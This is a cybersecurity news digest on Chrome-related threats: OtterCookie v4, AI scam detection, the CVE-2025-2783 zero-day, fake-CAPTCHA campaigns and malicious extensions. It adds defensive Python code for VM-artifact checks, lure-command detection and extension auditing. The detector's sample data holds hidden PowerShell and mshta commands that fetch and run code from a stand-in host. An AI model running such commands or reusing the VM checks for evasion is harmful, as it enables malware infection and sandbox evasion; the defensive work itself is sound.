CyberSecurity news

FlagThis - #chrome

@securityonline.info //
The North Korean threat actor WaterPlum, also known as Famous Chollima or PurpleBravo, is behind the latest iteration of the OtterCookie malware, version 4. This cross-platform malware is designed to target financial institutions, cryptocurrency platforms, and FinTech companies across the globe. OtterCookie's evolution demonstrates a significant advancement in its capabilities, posing an increased threat level. The malware is often deployed through the "Contagious Interview" campaign, which uses fake job offers to entice victims into opening malicious payloads.

OtterCookie v4 adds dedicated credential-theft modules for Google Chrome, MetaMask, and iCloud Keychain. One module decrypts and extracts saved passwords from Chrome using the Windows Data Protection API (DPAPI); because DPAPI unwraps the browser's key under the logged-on user's own context, the stealer needs no elevated privileges to do this. Another module targets the MetaMask extension in Chromium-based browsers such as Chrome and Brave, and iCloud Keychain on macOS, to harvest wallet and account data. Stolen credentials are staged in a local database before exfiltration. This is a significant step up from earlier versions of OtterCookie, which functioned primarily as a file grabber.

A key addition in v4 is virtual-machine detection for VMware, VirtualBox, Microsoft Hyper-V, and QEMU, which lets the malware evade analysis by security researchers and automated sandboxes: a sample that recognises one of these environments never shows its real behaviour there, so a clean sandbox verdict alone proves little for this family. Cross-platform support for Windows, macOS, and Linux broadens its potential impact considerably. Researchers first exposed OtterCookie in December 2024, and the malware has evolved rapidly since, with version 3 appearing in February 2025 and version 4 in April 2025.
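The VM checks described above follow a well-known pattern: look for vendor strings, MAC address prefixes, the CPUID hypervisor vendor leaf, and guest-tools drivers that only exist inside a VM. The classifier below is an added example (not OtterCookie's code, nor anything from NTT's report) that shows which artifacts such a check keys on, and therefore what an analysis VM has to hide. The artifact values fed to it are constructed, and the OUI prefixes, CPUID vendor strings and driver paths are the publicly documented ones for each hypervisor.

```python
"""Hypervisor-artifact classifier (added example, not OtterCookie's code).

Mirrors the kind of checks a sample uses to spot VMware, VirtualBox,
Hyper-V and QEMU guests. Evidence is collected into a plain dataclass so
the classifier can be exercised offline on constructed input.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass, field

# MAC OUI prefixes assigned to the hypervisor vendors (IEEE registry).
OUI_TABLE = {
    "00:0c:29": "VMware", "00:50:56": "VMware", "00:05:69": "VMware",
    "08:00:27": "VirtualBox",
    "00:15:5d": "Hyper-V",
    "52:54:00": "QEMU/KVM",
}

# Vendor strings returned by CPUID leaf 0x40000000 (hypervisor vendor ID).
CPUID_TABLE = {
    "VMwareVMware": "VMware",
    "VBoxVBoxVBox": "VirtualBox",
    "Microsoft Hv": "Hyper-V",
    "KVMKVMKVM": "QEMU/KVM",
    "TCGTCGTCGTCG": "QEMU/KVM",
}

# Guest-tools drivers/devices whose mere presence gives the vendor away.
PATH_TABLE = {
    "/dev/vboxguest": "VirtualBox",
    "/dev/vmci": "VMware",
    r"C:\Windows\System32\drivers\VBoxGuest.sys": "VirtualBox",
    r"C:\Windows\System32\drivers\vmhgfs.sys": "VMware",
    r"C:\Windows\System32\drivers\vmmouse.sys": "VMware",
}

DMI_PATTERNS = [
    (re.compile(r"vmware", re.I), "VMware"),
    (re.compile(r"innotek|virtualbox", re.I), "VirtualBox"),
    (re.compile(r"qemu|bochs", re.I), "QEMU/KVM"),
]


@dataclass
class Artifacts:
    dmi_vendor: str = ""
    dmi_product: str = ""
    mac_addresses: list[str] = field(default_factory=list)
    cpuid_hypervisor: str = ""
    existing_paths: list[str] = field(default_factory=list)


def classify(a: Artifacts) -> dict[str, list[str]]:
    """Map each suspected hypervisor vendor to the evidence that implicates it."""
    hits: dict[str, list[str]] = {}

    def add(vendor: str, why: str) -> None:
        hits.setdefault(vendor, []).append(why)

    for mac in a.mac_addresses:
        prefix = mac.lower().replace("-", ":")[:8]
        if prefix in OUI_TABLE:
            add(OUI_TABLE[prefix], f"MAC OUI {prefix}")
    for pattern, vendor in DMI_PATTERNS:
        if pattern.search(a.dmi_vendor) or pattern.search(a.dmi_product):
            add(vendor, f"DMI {a.dmi_vendor!r}/{a.dmi_product!r}")
    # Hyper-V guests report a Microsoft board with product "Virtual Machine";
    # a Surface also says Microsoft, so both fields are required.
    if re.search(r"microsoft", a.dmi_vendor, re.I) and re.search(r"virtual machine", a.dmi_product, re.I):
        add("Hyper-V", f"DMI {a.dmi_vendor!r}/{a.dmi_product!r}")
    vendor_id = a.cpuid_hypervisor.strip("\x00 ")
    if vendor_id in CPUID_TABLE:
        add(CPUID_TABLE[vendor_id], f"CPUID hypervisor vendor {vendor_id!r}")
    for path in a.existing_paths:
        if path in PATH_TABLE:
            add(PATH_TABLE[path], f"guest driver/device {path}")
    return hits


def is_virtual(a: Artifacts) -> bool:
    return bool(classify(a))


def collect_linux() -> Artifacts:
    """Best-effort live collection on a Linux guest (CPUID needs native code, so it is skipped)."""
    def read(p: str) -> str:
        try:
            with open(p, encoding="utf-8", errors="replace") as f:
                return f.read().strip()
        except OSError:
            return ""
    ifaces = os.listdir("/sys/class/net") if os.path.isdir("/sys/class/net") else []
    return Artifacts(
        dmi_vendor=read("/sys/class/dmi/id/sys_vendor"),
        dmi_product=read("/sys/class/dmi/id/product_name"),
        mac_addresses=[read(f"/sys/class/net/{i}/address") for i in ifaces],
        existing_paths=[p for p in PATH_TABLE if os.path.exists(p)],
    )


# Constructed artifact sets (not captured from real hosts).
VMWARE_GUEST = Artifacts("VMware, Inc.", "VMware Virtual Platform",
                         ["00:0C:29:AB:CD:EF"], "VMwareVMware", ["/dev/vmci"])
HYPERV_GUEST = Artifacts("Microsoft Corporation", "Virtual Machine",
                         ["00:15:5D:01:02:03"], "Microsoft Hv")
BARE_METAL = Artifacts("Dell Inc.", "OptiPlex 7090", ["3C:2C:30:AA:BB:CC"], "")

if __name__ == "__main__":
    for name, art in [("vmware", VMWARE_GUEST), ("hyperv", HYPERV_GUEST), ("dell", BARE_METAL)]:
        print(name, classify(art))
```

Two caveats when reading the output: a physical Windows host with virtualization-based security enabled runs under Hyper-V and therefore reports "Microsoft Hv" in CPUID, so that signal alone is not proof of a sandbox; and each signal is cheap to spoof from the hypervisor side (custom OUI, patched DMI tables, renamed guest drivers), which is exactly what a detonation environment for this family should do.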

Recommended read:
References :
  • MeatMutts: OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities
  • Anonymous: NTT Security's Masaya Motoda & Rintaro Koike detail the key differences between the OtterCookie malware variants used by WaterPlum (Famous Chollima/PurpleBravo) in November 2024 and in February and April 2025, highlighting their chronological evolution.
  • securityonline.info: WaterPlum’s OtterCookie Malware Upgrades to v4 with Credential Theft and Sandbox Detection Features
  • Anonymous: NTT Security - OtterCookie Malware variants by WaterPlum
  • securityonline.info: Information on new malware OtterCookie

@www.webroot.com //
Cybercriminals are increasingly using sophisticated tactics to deceive individuals and steal sensitive information. One common method is smishing: fraudulent text messages that impersonate legitimate businesses such as delivery services or banks and entice victims to click malicious links, leading to identity theft, financial loss, or malware installation. Webroot's point is mobile security: a phone that falls for a text scam can expose its owner to identity theft and end up with malware planted on it. The Federal Trade Commission reported that consumers lost $470 million to scams initiated through text messages in 2024.

Google is intensifying its efforts to combat these online threats by integrating artificial intelligence across its various platforms. The company is leveraging AI in Search, Chrome, and Android to identify and block scam attempts more effectively. Google's AI-powered defenses are capable of detecting 20 times more scam pages than before, significantly improving the quality of search results. Furthermore, AI is used to identify fraudulent websites, app notifications, calls, and direct messages, helping to safeguard users from various scam tactics.

A key component of Google's enhanced protection is the integration of Gemini Nano, a lightweight, on-device AI model, into Chrome. This allows for instant identification of scams, even those that haven't been previously encountered. When a user navigates to a potentially dangerous page, Chrome evaluates the page using Gemini Nano, which extracts security signals to determine the intent of the page. This information is then sent to Safe Browsing for a final verdict, adding an extra layer of protection against evolving online threats.

Recommended read:
References :
  • www.eweek.com: Google is intensifying efforts to combat online scams by integrating artificial intelligence across Search, Chrome, and Android, aiming to make fraud more difficult for cybercriminals.
  • www.webroot.com: It all starts so innocently. You get a text saying “Your package couldn’t be delivered. Click here to reschedule.” Little do you know, clicking that link could open the door for scammers to steal your identity, empty your bank account, or even plant malicious software (malware) on your device. Unless you know what to look out

The Hacker News //
Google is ramping up its AI integration across various platforms to enhance user security and accessibility. The tech giant is deploying AI models in Chrome to detect and block online scams, protecting users from fraudulent websites and suspicious notifications. These AI-powered systems are already proving effective in Google Search, blocking hundreds of millions of scam results daily and significantly reducing fake airline support pages by over 80 percent. Google is also using AI in a new iOS feature called Simplify, which leverages Gemini's large language models to translate dense technical jargon into plain, readable language, making complex information more accessible.

Google's Gemini is also seeing updates in other areas, including new features for simplification and potentially expanded access for younger users. The Simplify feature, accessible via the Google App on iOS, aims to break down technical jargon found in legal contracts or medical reports. Google conducted a study showing improved comprehension among users who read Simplify-processed text, however, the study's limitations highlight the challenges in accurately gauging the full impact of AI-driven simplification. Google's plan to make Gemini available to users under 13 has also sparked concerns among parents and child safety experts, prompting Google to implement parental controls through Family Link and assure that children's activity won't be used to train its AI models.

However, the integration of AI has also presented unforeseen challenges. A recent update to Gemini inadvertently broke content filters for apps that relied on lowered guardrails, particularly those providing support for trauma survivors: incident reports on sensitive topics are now blocked, which raises questions about the limits and potential biases of AI-driven content moderation. Developers of apps that assist trauma survivors report that the change has rendered their apps unusable.

Recommended read:
References :
  • bsky.app: Google is implementing a new Chrome security feature that uses the built-in 'Gemini Nano' large-language model (LLM) to detect and block tech support scams while browsing the web.
  • PCMag UK security: Google's Chrome Browser Taps On-Device AI to Catch Tech Support Scams
  • BleepingComputer: Google Chrome to use on-device AI to detect tech support scams
  • thecyberexpress.com: Google is betting on AI
  • The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
  • techstrong.ai: Google’s Plan to Make Gemini Available to Those Under-13 Is Raising Deep Concerns
  • THE DECODER: Google deploys AI in Chrome to detect and block online scams
  • eWEEK: Google has rolled out a new iOS feature called Simplify that uses Gemini’s large language models to turn dense technical jargon such as what you would find in legal contracts or medical reports into plain, readable language without sacrificing key details.
  • Davey Winder: Mobile malicious, misleading, spammy or scammy — Google fights back against Android attacks with new AI-powered notification protection.
  • Malwarebytes: Google announced it will equip Chrome with an AI driven method to detect and block Tech Support Scam websites
  • cyberinsider.com: Google plans to introduce a new security feature in Chrome 137 that uses on-device AI to detect tech support scams in real time.
  • The DefendOps Diaries: Google Chrome's AI-Powered Defense Against Tech Support Scams
  • gbhackers.com: Google Chrome Uses Advanced AI to Combat Sophisticated Online Scams
  • security.googleblog.com: Using AI to stop tech support scams in Chrome
  • cyberpress.org: Chrome 137 Adds Gemini Nano AI to Combat Tech Support Scams
  • thecyberexpress.com: Google Expands On-Device AI to Counter Evolving Online Scams
  • www.eweek.com: Google is intensifying efforts to combat online scams by integrating artificial intelligence across Search, Chrome, and Android, aiming to make fraud more difficult for cybercriminals.
  • CyberInsider: Details on Google Chrome for Android deploying on-device AI to tackle tech support scams.
  • : discusses Chrome adding on-device AI to detect scams in real time.
  • www.ghacks.net: Google integrates local Gemini AI into Chrome browser for scam protection.
  • gHacks Technology News: Scam Protection: Google integrates local Gemini AI into Chrome browser
  • www.scworld.com: Google to deploy AI-powered scam detection in Chrome

The Hacker News //
Google is integrating its Gemini Nano AI model into the Chrome browser to provide real-time scam protection for users. This enhancement focuses on identifying and blocking malicious websites and activities as they occur, addressing the challenge posed by scam sites that often exist for only a short period. The integration of Gemini Nano into Chrome's Enhanced Protection mode, available since 2020, allows for the analysis of website content to detect subtle signs of scams, such as misleading pop-ups or deceptive tactics.

When a user visits a potentially dangerous page, Chrome uses Gemini Nano to evaluate security signals and determine the intent of the site. This information is then sent to Safe Browsing for a final assessment. If the page is deemed likely to be a scam, Chrome will display a warning to the user, providing options to unsubscribe from notifications or view the blocked content while also allowing users to override the warning if they believe it's unnecessary. This system is designed to adapt to evolving scam tactics, offering a proactive defense against both known and newly emerging threats.

Google credits its AI-based scam classifiers with catching 20 times more scam pages than previous methods, a figure it reports for Search, where the same approach has been in place longer. Google also plans to extend the Chrome feature to Android devices later this year, expanding protection to mobile users. The initiative follows criticism over Gmail phishing scams that impersonate law enforcement, and is part of a broader push to improve security across Google's platforms and safeguard users from fraud.

Recommended read:
References :
  • Search Engine Journal: How Google Protects Searchers From Scams: Updates Announced
  • www.zdnet.com: How Google's AI combats new scam tactics - and how you can stay one step ahead
  • cyberinsider.com: Google plans to introduce a new security feature in Chrome 137 that uses on-device AI to detect tech support scams in real time.
  • The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
  • Davey Winder: Google Confirms Android Attack Warnings — Powered By AI
  • securityonline.info: Chrome 137 Uses On-Device Gemini Nano AI to Combat Tech Support Scams
  • BleepingComputer: Google is implementing a new Chrome security feature that uses the built-in 'Gemini Nano' large-language model (LLM) to detect and block tech support scams while browsing the web. [...]
  • The Official Google Blog: How we’re using AI to combat the latest scams
  • The Tech Portal: Google to deploy Gemini Nano AI for real-time scam protection in Chrome
  • www.tomsguide.com: Google is keeping you safe from scams across search and your smartphone
  • www.eweek.com: Google’s Scam-Fighting Efforts Just Got Accelerated, Thanks to AI
  • the-decoder.com: Google deploys AI in Chrome to detect and block online scams.
  • www.techradar.com: Tired of scams? Google is enlisting AI to protect you in Chrome, Google Search, and on Android.
  • PCMag UK security: Google's Chrome Browser Taps On-Device AI to Catch Tech Support Scams
  • Analytics India Magazine: Google Chrome to Use AI to Stop Tech Support Scams
  • THE DECODER: Google is now using AI models to protect Chrome users from online scams.
  • bsky.app: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
  • The DefendOps Diaries: Google Chrome's AI-Powered Defense Against Tech Support Scams
  • thecyberexpress.com: Google has released new details on how artificial intelligence (AI) is being used across its platforms to combat a growing wave of online scams. In its latest Fighting Scams in Search report, the company outlines AI-powered systems that are already blocking hundreds of millions of harmful results daily and previews further enhancements being rolled out across Google Search, Chrome, and Android.
  • gHacks Technology News: Scam Protection: Google integrates local Gemini AI into Chrome browser
  • Malwarebytes: Google Chrome will use AI to block tech support scam websites
  • security.googleblog.com: Using AI to stop tech support scams in Chrome
  • iHLS: Chrome Adds On-Device AI to Detect Scams in Real Time
  • bsky.app: Google will use on-device LLMs to detect potential tech support scams and alert Chrome users to possible dangers
  • bsky.app: Google's #AI tools that protect against scammers: https://techcrunch.com/2025/05/08/google-rolls-out-ai-tools-to-protect-chrome-users-against-scams/ #ArtificialIntelligence

Sergiu Gatlan@BleepingComputer //
Google has released an out-of-band security update for Chrome to address a high-severity zero-day vulnerability, CVE-2025-2783, an incorrect-handle bug in Mojo, Chromium's inter-process communication layer, on Windows. The flaw was actively exploited in a sophisticated espionage campaign targeting Russian organizations, specifically media outlets, educational institutions, and government entities. According to Kaspersky, the exploit let attackers escape Chrome's sandbox and reach the underlying system with no further user interaction once the victim had opened the malicious link. It is the first actively exploited Chrome zero-day since the start of the year, underscoring the persistent threat browser users face.

Kaspersky's investigation, dubbed "Operation ForumTroll," found that the attacks began with personalized phishing emails disguised as invitations to the "Primakov Readings" forum. Clicking the link took victims to a malicious website that exploited the zero-day as soon as the page loaded. The technical sophistication of the exploit chain points to a highly skilled Advanced Persistent Threat (APT) group. Google urges users to update Chrome for Windows to version 134.0.6998.177/.178 immediately; note that a downloaded update only takes effect after the browser is restarted, so fleet checks should confirm the running version (chrome://version) rather than assume the patch is active. A similar bug in Firefox for Windows was patched by Mozilla days later as CVE-2025-2857 (see the references below).

Recommended read:
References :
  • cyberinsider.com: Google has released a security update for Chrome to address a high-severity zero-day vulnerability that was actively exploited in a sophisticated espionage campaign targeting Russian organizations.
  • thehackernews.com: Zero-Day Alert: Google Releases Chrome Patch for Exploit Used in Russian Espionage Attacks
  • securityaffairs.com: Google fixed the first actively exploited Chrome zero-day since the start of the year
  • techcrunch.com: Google fixes Chrome zero-day security flaw used in hacking campaign targeting journalists
  • thecyberexpress.com: Google has rolled out a new security update for Chrome users, following the discovery of a vulnerability, CVE-2025-2783, affecting the Windows version of the browser.
  • The DefendOps Diaries: Google Chrome Vulnerability CVE-2025-2783: A Closer Look
  • Cybernews: Google has patched a dangerous zero-day vulnerability that has already been exploited by sophisticated threat actors in the wild
  • Zack Whittaker: New: Google has fixed a zero-day bug in Chrome that was being actively exploited as part of a hacking campaign. Kaspersky says the bug was exploited to target journalists and employees at educational institutions.
  • Kaspersky official blog: Kaspersky’s GReAT experts have discovered the Operation ForumTroll APT attack, which used a zero-day vulnerability in Google Chrome.
  • bsky.app: Google has fixed a high-severity Chrome zero-day vulnerability exploited to escape the browser's sandbox and deploy malware in espionage attacks targeting Russian organizations.
  • Cyber Security News: Operation ForumTroll: APT Hackers Use Chrome Zero-Day to Evade Sandbox Protections.
  • www.bleepingcomputer.com: Google has released out-of-band fixes to address a high-severity security flaw in Chrome browser for Windows that has been actively exploited.
  • Help Net Security: Google fixes exploited Chrome sandbox bypass zero-day (CVE-2025-2783)
  • securityonline.info: CVE-2025-2783: Chrome Zero-Day Exploited in State-Sponsored Espionage Campaign
  • MSSP feed for Latest: Google remediated the high-severity Chrome for Windows zero-day vulnerability.
  • The Register - Security: After Chrome patches zero-day used to target Russians, Firefox splats similar bug
  • thecyberexpress.com: CISA Issues Urgent Security Alerts: Critical Vulnerabilities in Schneider Electric, Chrome, and Sitecore
  • PCMag UK security: Details about Firefox also being affected by Chrome zero-day flaw
  • CyberInsider: Firefox Says It’s Vulnerable to Chrome’s Zero-Day Used in Espionage Attacks
  • iHLS: Google Patches Dangerous Zero-Day Flaw in Chrome
  • PCMag UK security: Time to Patch: Google Chrome Flaw Used to Spread Spyware
  • MSPoweruser: Google patches a Chrome zero-day vulnerability used in espionage
  • The Hacker News: Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day.
  • Blog: Mozilla has released updates to fix a critical security flaw in its Firefox browser for Windows. The vulnerability, designated CVE-2025-2857, stems from improper handling within the browser's inter-process communication (IPC) code, which could allow a compromised child process to gain elevated privileges by manipulating the parent process into returning a powerful handle, potentially leading to sandbox escape.
  • techcrunch.com: Mozilla patches Firefox bug ‘exploited in the wild,’ similar to bug attacking Chrome
  • securityaffairs.com: Google addressed a critical vulnerability, tracked as CVE-2025-2783, impacting its Chrome browser for Windows.
  • securityaffairs.com: U.S. CISA adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog
  • www.scworld.com: Mozilla Patches Firefox Bug Exploited in the Wild, Similar to Chrome Zero-Day
  • OODAloop: Firefox Affected by Flaw Similar to Chrome Zero-Day Exploited in Russia
  • bsky.app: Google has released out-of-band fixes to address a high-severity security flaw in its Chrome browser for Windows that has been exploited in the wild as part of attacks targeting organizations in Russia.

Andres Ramos@Arctic Wolf //
A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. The injected page presents a fake CAPTCHA challenge that, instead of verifying anything, copies a command to the victim's clipboard and instructs them to paste it into the Windows Run dialog, so PowerShell code executes in the victim's own session without a file ever being downloaded first. The campaign pairs this social engineering with fake software downloads to trick users into running malicious scripts.

The same trick appears on fake CAPTCHA pages that imitate legitimate sites: when users try to pass the check, they are prompted to execute a command that has already been placed on their clipboard. The OBSCURE#BAT campaign, delivered this way, is a serious threat to individuals and organizations because it hooks Windows APIs so that its files and registry entries are hidden from any tool that relies on those APIs, which makes detection difficult.
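Because the victim types the command, the evidence lands in two places defenders already collect: process-creation telemetry (Sysmon event ID 1 or EDR equivalents) showing an interpreter spawned by explorer.exe, and the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The detection logic below is an added example, not Arctic Wolf's or Trustwave's tooling; the event records and registry values it runs over are constructed, the indicator list is an assumption about what such lures look like, and thresholds are deliberately simple so they can be tuned.

```python
"""Detection logic for clipboard-to-Run-dialog fake-CAPTCHA chains
(added example, not taken from any vendor report).

Two sources are checked: Sysmon event ID 1 process-creation records, and the
HKCU\\...\\Explorer\\RunMRU registry values that the Win+R dialog keeps.
Sample records below are constructed, not captured from an incident.
"""
from __future__ import annotations

import ntpath
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Content indicators; each regex carries the reason reported to the analyst.
INDICATORS = [
    (re.compile(r"-(?:w|windowstyle)\s+h(?:idden)?\b", re.I), "hidden window"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
     "remote content fetch"),
    (re.compile(r"frombase64string|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
     "encoded payload"),
    (re.compile(r"https?://", re.I), "URL on command line"),
    (re.compile(r"not a robot|verify you are human|captcha|verification id", re.I),
     "CAPTCHA lure text"),
]


def score_command(cmdline: str) -> list[str]:
    return [reason for pattern, reason in INDICATORS if pattern.search(cmdline)]


def flag_process_event(ev: dict) -> list[str] | None:
    """Return reasons if a process-creation event looks like a pasted lure command."""
    image = ntpath.basename(ev["Image"]).lower()
    if image not in INTERPRETERS:
        return None
    reasons = score_command(ev["CommandLine"])
    from_run_dialog = ntpath.basename(ev["ParentImage"]).lower() == "explorer.exe"
    if from_run_dialog:
        reasons.append("launched from explorer.exe (Win+R / Run dialog)")
    # A shell opened from Explorer is normal; one opened from Explorer with
    # fetch/exec indicators, or any shell with two or more indicators, is not.
    content_hits = len(reasons) - int(from_run_dialog)
    if content_hits >= 2 or (content_hits >= 1 and from_run_dialog):
        return reasons
    return None


def parse_runmru(values: dict[str, str]) -> list[tuple[str, str]]:
    """RunMRU stores each command as 'cmd\\1' under a letter; MRUList gives recency order."""
    order = values.get("MRUList", "")
    out = []
    for key in order:
        raw = values.get(key)
        if raw is None:
            continue
        out.append((key, raw[:-2] if raw.endswith("\\1") else raw))
    return out


def flag_runmru(values: dict[str, str]) -> list[tuple[str, str, list[str]]]:
    flagged = []
    for key, cmd in parse_runmru(values):
        reasons = score_command(cmd)
        if reasons:
            flagged.append((key, cmd, reasons))
    return flagged


SAMPLE_EVENTS = [  # constructed Sysmon EID 1 records
    {"Note": "user opens a shell", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"Note": "pasted CAPTCHA lure", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)" '
                    "# I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"Note": "scheduled admin script", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Note": "mshta variant", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/v.hta"},
]

SAMPLE_RUNMRU = {  # constructed registry values
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)"\\1',
}


def run_detection(events: list[dict] = SAMPLE_EVENTS) -> list[tuple[str, list[str]]]:
    hits = []
    for ev in events:
        reasons = flag_process_event(ev)
        if reasons:
            hits.append((ev["Note"], reasons))
    return hits


if __name__ == "__main__":
    for note, reasons in run_detection():
        print(f"ALERT {note}: {', '.join(reasons)}")
    for key, cmd, reasons in flag_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU[{key}] {cmd!r}: {', '.join(reasons)}")
```

The RunMRU check is the one to run during triage of a suspected victim: the pasted command survives there in plain text even after the attacker's page is gone, and a hidden-window PowerShell one-liner in a user's Run history is rarely legitimate. Blocking the Run dialog or PowerShell for standard users (via AppLocker or Group Policy) removes the execution path entirely where that is operationally acceptable.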

Recommended read:
References :
  • Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
  • hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
  • Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
  • SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
  • www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
  • Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
  • www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
  • : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
  • Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
  • Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
  • www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
  • gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
  • Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
  • securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites

Aman Mishra@gbhackers.com //
A recent investigation has uncovered a cluster of 16 malicious Chrome extensions that compromised at least 3.2 million users. The extensions, which offered functions such as screen capture, ad blocking, and emoji keyboards, injected code into the browser to commit advertising and search-engine-optimization fraud. GitLab's security team found them on the official Chrome Web Store, where they were being used to insert ads and manipulate search results.

The malicious extensions operate by checking in with unique configuration servers, transmitting their extension version and a hardcoded ID, and storing the returned configuration locally. They set alarms to refresh this data periodically and degrade browser security by stripping Content Security Policy (CSP) protections from the pages they touch. Google was notified and all identified extensions have been removed from the Chrome Web Store. However, removal from the store does not uninstall existing copies, so affected users must remove the extensions by hand from chrome://extensions.
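The behaviours described above map onto a small set of declared capabilities that can be read straight out of an extension's manifest and its static declarativeNetRequest rulesets: host access to every site, a background worker with the alarms permission, and a modifyHeaders rule that removes Content-Security-Policy from responses. The audit below is an added example (not GitLab's analysis tooling) for reviewing extensions already installed on a machine; the manifests and rules it runs over are constructed to resemble the described behaviour and are not copied from any real extension, and the on-disk layout assumed in audit_unpacked is Chrome's standard <profile>/Extensions/<id>/<version>/ tree.

```python
"""Chrome extension audit (added example; not GitLab's analysis tooling).

Loads an unpacked extension's manifest.json plus any static declarativeNetRequest
rulesets it declares and reports the capabilities the campaign above relied on:
broad host access, periodic background execution, and response-header rules that
remove Content-Security-Policy.
"""
from __future__ import annotations

import json
import os

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
RISKY_PERMISSIONS = {
    "declarativeNetRequest": "can rewrite requests/responses",
    "declarativeNetRequestWithHostAccess": "can rewrite requests/responses on granted hosts",
    "webRequest": "observes all traffic",
    "webRequestBlocking": "can modify traffic (MV2)",
    "scripting": "can inject scripts into pages",
    "alarms": "periodic background execution (config refresh)",
    "cookies": "reads site cookies",
}
CSP_HEADERS = {"content-security-policy", "content-security-policy-report-only"}


def audit_extension(manifest: dict, rulesets: dict[str, list[dict]]) -> list[str]:
    """Return human-readable findings; an empty list means nothing notable."""
    findings: list[str] = []
    hosts = set(manifest.get("host_permissions", [])) | set(manifest.get("permissions", []))
    if hosts & BROAD_HOSTS:
        findings.append("host access to every site: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    for perm in manifest.get("permissions", []):
        if perm in RISKY_PERMISSIONS:
            findings.append(f"permission {perm}: {RISKY_PERMISSIONS[perm]}")
    for cs in manifest.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS:
            findings.append("content script injected into every page: " + ", ".join(cs.get("js", [])))
    for name, rules in rulesets.items():
        for rule in rules:
            action = rule.get("action", {})
            if action.get("type") != "modifyHeaders":
                continue
            for h in action.get("responseHeaders", []):
                if h.get("header", "").lower() in CSP_HEADERS:
                    scope = rule.get("condition", {}).get("urlFilter", "?")
                    findings.append(
                        f"ruleset {name} rule {rule.get('id')} {h.get('operation')}s "
                        f"{h['header']} on urlFilter {scope!r}: strips CSP")
    return findings


def audit_unpacked(ext_dir: str) -> list[str]:
    """Audit one installed version directory, e.g. <profile>/Extensions/<id>/<version>/."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8-sig") as f:
        manifest = json.load(f)
    rulesets = {}
    for res in manifest.get("declarative_net_request", {}).get("rule_resources", []):
        with open(os.path.join(ext_dir, res["path"]), encoding="utf-8-sig") as f:
            rulesets[res["id"]] = json.load(f)
    return audit_extension(manifest, rulesets)


# Constructed manifests modelled on the described behaviour, not copied from any real extension.
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3, "name": "Emoji Keyboard Plus", "version": "2.4.1",
    "permissions": ["declarativeNetRequest", "alarms", "storage", "scripting"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
    "declarative_net_request": {"rule_resources": [{"id": "rs1", "enabled": True, "path": "rules.json"}]},
}
SUSPICIOUS_RULES = {"rs1": [{
    "id": 1, "priority": 1,
    "action": {"type": "modifyHeaders",
               "responseHeaders": [{"header": "content-security-policy", "operation": "remove"}]},
    "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]},
}]}
BENIGN_MANIFEST = {
    "manifest_version": 3, "name": "Word Count", "version": "1.0",
    "permissions": ["storage"],
    "action": {"default_popup": "popup.html"},
}

if __name__ == "__main__":
    for line in audit_extension(SUSPICIOUS_MANIFEST, SUSPICIOUS_RULES):
        print("-", line)
```

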